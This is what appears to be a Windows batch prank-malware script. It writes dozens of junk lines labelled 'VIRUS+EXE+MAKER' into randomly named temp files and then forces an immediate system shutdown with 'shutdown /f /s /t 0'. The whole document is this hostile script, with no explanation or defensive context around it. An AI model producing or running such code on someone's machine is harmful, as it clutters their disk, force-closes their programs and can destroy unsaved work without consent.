echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
echo tmp/r-&t)/VIRUS+EXE+MAKER>>tmp%random%.tmp
timeout 5
shutdown /f /s /t 0

:exit
exit